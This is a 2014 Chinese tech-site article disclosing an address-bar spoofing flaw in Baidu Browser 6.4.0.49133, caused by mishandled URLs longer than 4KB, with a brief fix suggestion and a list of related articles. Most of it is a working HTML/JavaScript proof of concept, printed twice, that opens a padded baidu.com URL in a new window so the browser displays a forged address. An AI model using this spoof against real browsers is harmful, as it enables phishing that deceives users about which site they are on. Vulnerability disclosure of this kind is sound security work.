浏览器漏洞 百度浏览器6.4.0.49133 伪造任意网址
发布时间:2014-09-25 16:01:22 作者:佚名 
我要评论
我要评论百度浏览器近期发现漏洞,百度浏览器6.4.0.49133 一旦域名、网址URL长度大于4KB时处理出错,例如将证明文件保存为c:\a.htm并打开,点击连接后可以伪造任意网,需要的朋友可以参考下
(福利推荐:你还在原价购买阿里云服务器?现在阿里云0.8折限时抢购活动来啦!4核8G企业云服务器仅2998元/3年,立即抢购>>>:9i0i.cn/aliyun)
百度浏览器近期发现漏洞,百度浏览器6.4.0.49133以及以前版本伪造任意网址漏洞,伪造任意协议(http/https/ftp...)、域名、网址URL长度大于4KB时处理出错,例如将证明文件保存为c:\a.htm并打开,点击连接后可以伪造任意网址。
同时URL过长的时候,会显示“已收藏”图标,估计是处理过长url时逻辑有点小问题漏洞证明:
复制代码
代码如下: <html>
<div id='c' style=''> //displaynone
ss
</div>
<a href="#" target="newwin" id='v' style="display:block" onclick="invokePoC();window.open('javascript:1;','newwin');">just click me</a>
<script>
function invokePoC() {
wx = open("http://www.baidu.com/account/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</p> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
","newwin");//setInterval("doit()",5000);
}
if(window.name == "newwin")
{
document.getElementById('c').innerText = ':). due to an internal error(>10Kbytes url), the fav icon will be shown. if you just want the shortest url, just make it for about 4KB';document.write("<title>:)</title>");
document.getElementById('v').style.display = 'none';}
</script>
</html>
<div id='c' style=''> //displaynone
ss
</div>
<a href="#" target="newwin" id='v' style="display:block" onclick="invokePoC();window.open('javascript:1;','newwin');">just click me</a>
<script>
function invokePoC() {
wx = open("http://www.baidu.com/account/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</p> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
","newwin");//setInterval("doit()",5000);
}
if(window.name == "newwin")
{
document.getElementById('c').innerText = ':). due to an internal error(>10Kbytes url), the fav icon will be shown. if you just want the shortest url, just make it for about 4KB';document.write("<title>:)</title>");
document.getElementById('v').style.display = 'none';}
</script>
</html>
修复方案:
无效URL及时过滤,以防止伪造网址,谢谢阅读,希望能帮到大家,请继续关注程序员之家,我们会努力分享更多优秀的文章。
相关文章
- 百度浏览器常用快捷键都整理出来.供大家参考2012-10-26
- 百度浏览器升级之后不但能截图什么的,还能翻译网页。那么百度浏览器怎么翻译网页?以及百度浏览器怎么使用翻译插件呢?针对此问题,本文就为大家图文介绍百度浏览器翻译网2014-09-23
- 百度浏览器怎么用?今天小编给大家简要的介绍下百度浏览器的使用方法,主要给大家分享下百度浏览器怎么安装、百度浏览器怎么设置为默认浏览器、以及百度浏览器清理缓存,希2014-09-23
- 百度浏览器可以屏蔽各大网站出现的广告大家知道吗?那百度浏览器怎么屏蔽广告?针对此问题,本文就为大家分享的两个有效的方法2014-09-23
- 百度浏览器怎么翻译,喜欢经常浏览一些国外网站的朋友,会非常方便与实用,下面是具体的操作过程,希望大家喜欢2014-09-25
- 目前网上有很多朋友们反映百度浏览器找不到卸载的功能,并且还有卸载不了的情况,那么,百度浏览器怎么卸载呢?针对此问题,本文就为大家详细图文介绍百度浏览器卸载教程2014-09-25
- 每天首次打开百度浏览器的时候,都会卡顿半天,因此打算先卸载百度浏览器,之后再重新安装一遍试试,下面与大家分享下百度浏览器卸载方法,有遇到类似情况的朋友可以参考下2014-09-29
- 百度浏览器是最近比较火,非常不错的国外加速频道,良好的兼容性,站长必备工具啊,打开google也不用什么工具2014-10-07
- 新版的百度浏览器也支持了截图功能,那么,我们如何使用百度浏览器进行网页截图?以及百度浏览器的截图工具在哪里呢?针对此问题,本文就为大家介绍百度浏览器怎么截图2014-10-10
- 网页的字体大小,也是可以在浏览器上进行设置的,如果网页上的字太小,通过放大,就看得比较舒服,看看下面的截图就一目了然了2014-10-14
最新评论